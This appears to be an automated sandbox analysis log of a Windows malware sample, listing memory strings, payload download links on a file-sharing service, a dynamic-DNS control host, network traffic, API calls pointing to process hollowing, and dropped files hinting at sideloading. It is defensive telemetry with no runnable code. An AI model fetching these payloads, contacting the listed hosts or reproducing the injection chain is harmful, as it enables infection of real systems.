Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1484946816.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1483689151.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1677400225.000000007FA0F000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1634357707.00000000041D6000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000002.1747949897.0000000004146000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0$
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: veaiqniF.pif, 0000000A.00000002.1900086210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://severdops.ddns.net:2024
Source: qDKTsL1y44.exe, 00000000.00000002.1575958449.000000001BCCB000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1484946816.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1483689151.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1677400225.000000007FA0F000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1634357707.00000000041D6000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000002.1747949897.0000000004146000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com0
Source: Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com/
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com/D
Source: Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLRf0ha
Source: Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com/y4mM3rpwg7BF-uNJeP3DfPwGHRVNoN-DLFLu8jlzryO26WGzJKm854HPXCUj9LrimxR
Source: Finqiaev.PIF, 00000009.00000002.1627524051.0000000000A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5WdLIe
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk17j5
Source: Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com:443/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLR
Source: Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1627524051.0000000000A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com:443/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5W
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://6vq0og.dm.files.1drv.com:443/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk
Source: veaiqniF.pif	String found in binary or memory: https://checkip.amazonaws.com/socket
Source: veaiqniF.pif, 0000000C.00000002.1945846450.0000000000D90000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryresource
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/$Tu
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/)
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/Z
Source: Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/;
Source: Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=22C765749E54F934%21123&authkey=
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com:443/download?resid=22C765749E54F934%21123&authkey=
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49716 version: TLS 1.2

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_04204F7C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

0_2_04204F7C

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_0421F140 GetMessagePos,GetKeyboardState,

0_2_0421F140

Source: Yara match

File source: Process Memory Space: qDKTsL1y44.exe PID: 7304, type: MEMORYSTR

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0423CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,	0_2_0423CA40
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0423B5FC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0423B5FC
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0423B684 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0423B684
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0423B768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_0423B768
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041FFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_041FFCD8
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041FFD38 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,	0_2_041FFD38
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04207E4C CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_04207E4C
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041FFB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_041FFB80
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041FFB7E GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_041FFB7E
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 9_2_0419B768 NtOpenFile,NtReadFile,	9_2_0419B768
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 9_2_0415FD38 LoadLibraryExA,NtWriteVirtualMemory,FreeLibrary,	9_2_0415FD38
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 9_2_04167E4C GetMonitorInfoA,CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,Wow64SetThreadContext,NtResumeThread,	9_2_04167E4C
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 9_2_0415FB80 NtAllocateVirtualMemory,	9_2_0415FB80
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_0410CA40 WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,	11_2_0410CA40
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_0410B768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	11_2_0410B768
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040CFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	11_2_040CFCD8
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040CFD38 LoadLibraryExA,GetProcAddress,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,	11_2_040CFD38
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040D7E4C GetMonitorInfoA,CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	11_2_040D7E4C
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040CFB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	11_2_040CFB80
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_0410B684 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	11_2_0410B684
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_04103114 NtdllDefWindowProc_A,	11_2_04103114
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040EF340 NtdllDefWindowProc_A,GetCapture,	11_2_040EF340
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040E3E00 GetSubMenu,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	11_2_040E3E00
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_041038CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	11_2_041038CC
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_04103990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	11_2_04103990
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040CFB7E GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	11_2_040CFB7E

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_0423CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,

0_2_0423CA40

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

File created: C:\Users\Public\Libraries\truesight.sys

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows

Jump to behavior

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0422C508	0_2_0422C508
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041E2160	0_2_041E2160
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0425A1DD	0_2_0425A1DD
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04258D18	0_2_04258D18
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0424EFBB	0_2_0424EFBB
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0425AACF	0_2_0425AACF
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0425906B	0_2_0425906B
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04213E00	0_2_04213E00
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_042559D6	0_2_042559D6
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0426BA28	0_2_0426BA28
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 9_2_0418C508	9_2_0418C508
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 9_2_04142160	9_2_04142160
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 9_2_04173E00	9_2_04173E00
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040FC508	11_2_040FC508
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040B2160	11_2_040B2160
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040E3E00	11_2_040E3E00
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: 11_2_040C5862	11_2_040C5862

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\netutils.dll C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6

Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: String function: 040B6B54 appears 87 times
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: String function: 04144980 appears 77 times
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: String function: 04146B54 appears 86 times
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: String function: 040B4980 appears 77 times
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: String function: 04144B0C appears 363 times
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Code function: String function: 040B4B0C appears 363 times
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: String function: 041E4B0C appears 426 times
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: String function: 041E4980 appears 78 times
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: String function: 041E4788 appears 83 times
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: String function: 041E6B54 appears 87 times

Source: netutils.dll.0.dr

Static PE information: Number of sections : 19 > 10

Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs qDKTsL1y44.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
Source: qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
Source: qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs qDKTsL1y44.exe
Source: qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
Source: qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
Source: qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs qDKTsL1y44.exe

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: archiveint.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
